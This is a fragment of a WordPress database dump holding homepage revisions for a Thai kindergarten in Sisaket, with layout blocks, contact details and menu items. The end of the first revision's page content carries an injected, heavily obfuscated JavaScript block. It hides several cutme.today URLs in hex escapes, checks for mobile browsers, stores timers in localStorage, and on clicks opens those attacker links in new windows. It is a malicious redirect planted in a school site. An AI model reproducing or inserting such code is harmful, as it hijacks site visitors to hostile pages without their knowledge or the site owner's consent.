{\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-07-29 18:32:30','2024-07-29 11:32:30','',19,'http://watprato.ssk.in.th/?p=91',0,'revision','',0),
(92,1,'2024-07-29 18:32:44','2024-07-29 11:32:44','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_93202e-5b\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_e4ac7a-c6\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_e4ac7a-c6\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_fdcfc1-e7\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_987966-10\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_987966-10\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_7bc053-2c\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_3a11d0-a6\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_3a11d0-a6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_138813-93\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_138813-93\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_9f83a7-ce\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_9f83a7-ce\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7fabbb-99\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7fabbb-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_1d2215-71\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_1d2215-71\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7e7dd7-10\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7e7dd7-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3078a3-3c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3078a3-3c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_dadb4c-b7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_dadb4c-b7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_24abce-04\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_24abce-04\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 